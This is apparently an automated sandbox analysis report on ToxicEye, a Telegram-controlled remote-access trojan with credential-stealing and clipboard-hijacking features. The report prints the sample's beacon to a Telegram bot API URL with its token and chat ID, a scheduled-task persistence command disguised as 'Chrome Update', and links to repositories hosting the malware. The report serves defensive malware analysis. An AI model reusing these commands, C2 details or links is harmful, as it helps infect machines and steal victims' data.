IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1b37c	0x1b400	f981ec4e6b7ca2b585a5a67462cbe64c	False	0.4244283973623853	data	5.702465754060223	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1e000	0x5bc	0x600	7907b9697008599683b66a56d4c253ab	False	0.4186197916666667	data	4.115204569554272	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x20000	0xc	0x200	6d252e677ac089b71a09645c9359729a	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1e090	0x32c	data			0.4211822660098522
RT_MANIFEST	0x1e3cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 13:19:49.286058903 CET	49699	443	192.168.2.6	149.154.167.220
Jan 23, 2024 13:19:49.286092043 CET	443	49699	149.154.167.220	192.168.2.6
Jan 23, 2024 13:19:49.286210060 CET	49699	443	192.168.2.6	149.154.167.220
Jan 23, 2024 13:19:49.299298048 CET	49699	443	192.168.2.6	149.154.167.220
Jan 23, 2024 13:19:49.299314022 CET	443	49699	149.154.167.220	192.168.2.6
Jan 23, 2024 13:19:49.717947006 CET	443	49699	149.154.167.220	192.168.2.6
Jan 23, 2024 13:19:49.718045950 CET	49699	443	192.168.2.6	149.154.167.220
Jan 23, 2024 13:19:49.721827030 CET	49699	443	192.168.2.6	149.154.167.220
Jan 23, 2024 13:19:49.721833944 CET	443	49699	149.154.167.220	192.168.2.6
Jan 23, 2024 13:19:49.722023964 CET	443	49699	149.154.167.220	192.168.2.6
Jan 23, 2024 13:19:49.767786980 CET	49699	443	192.168.2.6	149.154.167.220
Jan 23, 2024 13:19:49.789567947 CET	49699	443	192.168.2.6	149.154.167.220
Jan 23, 2024 13:19:49.833897114 CET	443	49699	149.154.167.220	192.168.2.6
Jan 23, 2024 13:19:52.098843098 CET	443	49699	149.154.167.220	192.168.2.6
Jan 23, 2024 13:19:52.098893881 CET	443	49699	149.154.167.220	192.168.2.6
Jan 23, 2024 13:19:52.099000931 CET	49699	443	192.168.2.6	149.154.167.220
Jan 23, 2024 13:19:52.119282961 CET	49699	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 13:19:48.438899040 CET	53155	53	192.168.2.6	1.1.1.1
Jan 23, 2024 13:19:48.557838917 CET	53	53155	1.1.1.1	192.168.2.6
Jan 23, 2024 13:19:48.699702978 CET	64453	53	192.168.2.6	1.1.1.1
Jan 23, 2024 13:19:48.818393946 CET	53	64453	1.1.1.1	192.168.2.6
Jan 23, 2024 13:20:12.097091913 CET	63583	53	192.168.2.6	1.1.1.1
Jan 23, 2024 13:20:14.211009979 CET	63583	53	192.168.2.6	1.1.1.1
Jan 23, 2024 13:20:15.205822945 CET	63583	53	192.168.2.6	1.1.1.1
Jan 23, 2024 13:20:17.205501080 CET	63583	53	192.168.2.6	1.1.1.1
Jan 23, 2024 13:20:21.221441031 CET	63583	53	192.168.2.6	1.1.1.1

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 23, 2024 13:19:48.570919991 CET	192.168.2.6	142.251.15.139	4d5a		Echo
Jan 23, 2024 13:19:48.674257040 CET	142.251.15.139	192.168.2.6	555a		Echo Reply
Jan 23, 2024 13:19:48.819416046 CET	192.168.2.6	149.154.167.220	4d59		Echo
Jan 23, 2024 13:19:48.972187042 CET	192.168.2.6	149.154.167.220	4d58		Echo
Jan 23, 2024 13:19:49.022226095 CET	149.154.167.220	192.168.2.6	5559		Echo Reply
Jan 23, 2024 13:19:49.022325993 CET	192.168.2.6	149.154.167.220	fcfd	(Protocol unreachable)	Destination Unreachable
Jan 23, 2024 13:19:49.175095081 CET	149.154.167.220	192.168.2.6	5558		Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 23, 2024 13:19:48.438899040 CET	192.168.2.6	1.1.1.1	0x9e83	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:19:48.699702978 CET	192.168.2.6	1.1.1.1	0x6269	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:20:12.097091913 CET	192.168.2.6	1.1.1.1	0xdf69	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:20:14.211009979 CET	192.168.2.6	1.1.1.1	0xdf69	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:20:15.205822945 CET	192.168.2.6	1.1.1.1	0xdf69	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:20:17.205501080 CET	192.168.2.6	1.1.1.1	0xdf69	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:20:21.221441031 CET	192.168.2.6	1.1.1.1	0xdf69	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 23, 2024 13:19:48.557838917 CET	1.1.1.1	192.168.2.6	0x9e83	No error (0)	google.com	142.251.15.139	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:19:48.557838917 CET	1.1.1.1	192.168.2.6	0x9e83	No error (0)	google.com	142.251.15.113	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:19:48.557838917 CET	1.1.1.1	192.168.2.6	0x9e83	No error (0)	google.com	142.251.15.138	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:19:48.557838917 CET	1.1.1.1	192.168.2.6	0x9e83	No error (0)	google.com	142.251.15.101	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:19:48.557838917 CET	1.1.1.1	192.168.2.6	0x9e83	No error (0)	google.com	142.251.15.100	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:19:48.557838917 CET	1.1.1.1	192.168.2.6	0x9e83	No error (0)	google.com	142.251.15.102	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:19:48.818393946 CET	1.1.1.1	192.168.2.6	0x6269	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49699	149.154.167.220	443	5928	C:\Users\ToxicEye\rat.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-23 12:19:49 UTC	182	OUT	GET /bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-01-23 12:19:52 UTC	347	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Tue, 23 Jan 2024 12:19:52 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-01-23 12:19:52 UTC	58	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID:	0
Start time:	13:19:39
Start date:	23/01/2024
Path:	C:\Users\user\Desktop\dAIJ6g47mZ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\dAIJ6g47mZ.exe
Imagebase:	0x1f365bf0000
File size:	114'176 bytes
MD5 hash:	B4354EE75E6D043AD4BA2C6D2DF30A6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_ToxicEye, Description: Yara detected ToxicEye, Source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:19:39
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:19:42
Start date:	23/01/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
Imagebase:	0x7ff645b90000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:19:42
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:19:43
Start date:	23/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat
Imagebase:	0x7ff656f50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:19:43
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:19:43
Start date:	23/01/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	Tasklist /fi "PID eq 2960"
Imagebase:	0x7ff67eaf0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:19:43
Start date:	23/01/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find ":"
Imagebase:	0x7ff790bc0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:19:43
Start date:	23/01/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	Timeout /T 1 /Nobreak
Imagebase:	0x7ff78c3d0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:19:44
Start date:	23/01/2024
Path:	C:\Users\ToxicEye\rat.exe
Wow64 process (32bit):	false
Commandline:	"rat.exe"
Imagebase:	0x23f1be80000
File size:	114'176 bytes
MD5 hash:	B4354EE75E6D043AD4BA2C6D2DF30A6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security Rule: JoeSecurity_ToxicEye, Description: Yara detected ToxicEye, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 77%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:19:44
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:19:44
Start date:	23/01/2024
Path:	C:\Users\ToxicEye\rat.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\ToxicEye\rat.exe
Imagebase:	0x1ef98090000
File size:	114'176 bytes
MD5 hash:	B4354EE75E6D043AD4BA2C6D2DF30A6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:19:44
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:19:47
Start date:	23/01/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
Imagebase:	0x7ff645b90000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:19:47
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:19:51
Start date:	23/01/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5928 -s 2976
Imagebase:	0x7ff6a3f70000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD348A6C06 Relevance: .5, Instructions: 468
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2072986856.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_dAIJ6g47mZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab15f397f14dac65d1311a1eec564497c710666a3a4edf3a63e72260303f4ee
Instruction ID: 3a14441065fef3e83834535389d32a2ff190855b0d7502dc7e91bf757e766b51
Opcode Fuzzy Hash: 6ab15f397f14dac65d1311a1eec564497c710666a3a4edf3a63e72260303f4ee
Instruction Fuzzy Hash: 62F1B530A09A8D8FEBA8DF28C8557E937E1FF55310F14426EE84DC7295DF78A8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD348A79B2 Relevance: .5, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2072986856.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_dAIJ6g47mZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd9489354098019d98d6eeee2bf219cd3027ea46766809cc49bb7dda1fdcd74
Instruction ID: 3dcfb81981692456b31c22407b39d83f16d616ffe9957920356271b4a0958cd8
Opcode Fuzzy Hash: 3fd9489354098019d98d6eeee2bf219cd3027ea46766809cc49bb7dda1fdcd74
Instruction Fuzzy Hash: 7BE1C430A08A4E8FEBA8DF28C8A57E977E1FF55310F04426ED80DC7291DB78E9459781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD348A88ED Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD348A8990

Memory Dump Source

Source File: 00000000.00000002.2072986856.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_dAIJ6g47mZ.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 7a8f33881c509ccee178d214a312ba0c19ee697c4c1e0d5258ec4e95c5889984
Instruction ID: 2cbf35937280131c0c28d77cb68de7bf63b56556a52f70e0f6206051113c1459
Opcode Fuzzy Hash: 7a8f33881c509ccee178d214a312ba0c19ee697c4c1e0d5258ec4e95c5889984
Instruction Fuzzy Hash: 8B31E93190C7488FD729DBA8D8566E97BF0EF56321F04016FD049D3593DB656806CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD348A1C15 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00007FFD348A1C9F

Memory Dump Source

Source File: 00000000.00000002.2072986856.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_dAIJ6g47mZ.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 2be6815bd379b89b008f0cbbd9cdb8ca8dc311bd3c786e4b31cf739f04ffd668
Instruction ID: 327e083b75a78f541f630e18090b9b44774fa9cb093fcfe8e755e91353aa3e3e
Opcode Fuzzy Hash: 2be6815bd379b89b008f0cbbd9cdb8ca8dc311bd3c786e4b31cf739f04ffd668
Instruction Fuzzy Hash: 4B21837190CB4C8FDB69DB98D845AE9BBF0EF56320F00412FD049D3552DA746446CB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rat.exePID: 5928, Parent PID: 6428COMMON

Execution Graph

Execution Coverage:	16.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34889405 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD348894C1

Memory Dump Source

Source File: 0000000A.00000002.2172614485.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd34880000_rat.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 0b87281c42a1dd8e251321dec8437ef29270f08faff4bd20dfbbe7c3e87b3837
Instruction ID: efe8f245819b229fa14896a715bf28ba65a0f7e243e62639fca8401f809735b6
Opcode Fuzzy Hash: 0b87281c42a1dd8e251321dec8437ef29270f08faff4bd20dfbbe7c3e87b3837
Instruction Fuzzy Hash: BF31F531A0CA5C4FDB58EB5898566F9BBE1FB59311F00417ED009D3292DA75A8028BC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD348896B1 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD34889750

Memory Dump Source

Source File: 0000000A.00000002.2172614485.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd34880000_rat.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: c3cfcd1c7a766e8af9340207a027a86ca7427808f9f93dff06393a2622ea77fc
Instruction ID: 1822505b30343133ec6a9067d8963c0428a0d3520190702ee446d587245555b1
Opcode Fuzzy Hash: c3cfcd1c7a766e8af9340207a027a86ca7427808f9f93dff06393a2622ea77fc
Instruction Fuzzy Hash: 9121D73191CB488FEB28EB98D85A6F97BE0EB59321F00013ED04AD3652DB647846CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34881C15 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNEL32 ref: 00007FFD34881C9F

Memory Dump Source

Source File: 0000000A.00000002.2172614485.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd34880000_rat.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 793d599799509c748e44b7e33acbcc7d318d123cb43b220215940efacc960d2d
Instruction ID: 7621c20150974c66ab734b8b4c067e047a8fb72cdd00564d5fc3af6a38d8f1c0
Opcode Fuzzy Hash: 793d599799509c748e44b7e33acbcc7d318d123cb43b220215940efacc960d2d
Instruction Fuzzy Hash: 1B21A77190CB4C8FDB69DB98D845AE97BF0FF66320F00412FD089D3552DA756845CB51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD348811F7 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2172614485.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd34880000_rat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15178c14e2838b3bba7c0cc874fe9216443f8d55e849a531992a70b7856ea9d2
Instruction ID: 8a99b2660e35a24937caa331ad868abeef282f724b89f8953b1db51f02172c5d
Opcode Fuzzy Hash: 15178c14e2838b3bba7c0cc874fe9216443f8d55e849a531992a70b7856ea9d2
Instruction Fuzzy Hash: C361834090EAC56FD762D3F919B29AABFE08F07241B2C4AEAD4C5DB1D3D85C641AD312

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rat.exePID: 992, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FFD348A1C15 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00007FFD348A1C9F

Memory Dump Source

Source File: 0000000C.00000002.2093426005.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd348a0000_rat.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 7f9b64b9001d00bcd194145ffc7ff94347794667de27398c300a56265d5a86bb
Instruction ID: 327e083b75a78f541f630e18090b9b44774fa9cb093fcfe8e755e91353aa3e3e
Opcode Fuzzy Hash: 7f9b64b9001d00bcd194145ffc7ff94347794667de27398c300a56265d5a86bb
Instruction Fuzzy Hash: 4B21837190CB4C8FDB69DB98D845AE9BBF0EF56320F00412FD049D3552DA746446CB51

Uniqueness

Uniqueness Score: -1.00%

Source: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw	Avira URL Cloud: Label: malware
Source: https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip	Avira URL Cloud: Label: malware
Source: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs	Avira URL Cloud: Label: malware
Source: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dl	Avira URL Cloud: Label: malware
Source: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/Te	Avira URL Cloud: Label: malware

Source: dAIJ6g47mZ.exe	Malware Configuration Extractor: ToxicEye {"C2 url": "https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921"}
Source: rat.exe.5928.10.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage"}

Source: https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip	Virustotal: Detection: 12%	Perma Link
Source: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw	Virustotal: Detection: 6%	Perma Link
Source: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs	Virustotal: Detection: 6%	Perma Link

Source: rat.exe, 0000000A.00000002.2170409712.0000023F1DD10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: http://ip-api.com/json/
Source: dAIJ6g47mZ.exe, 00000000.00000002.2072333627.000001F367981000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DBE9000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000C.00000002.2093053581.000001EF99EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.18.dr	String found in binary or memory: http://upx.sf.net
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?bssid=
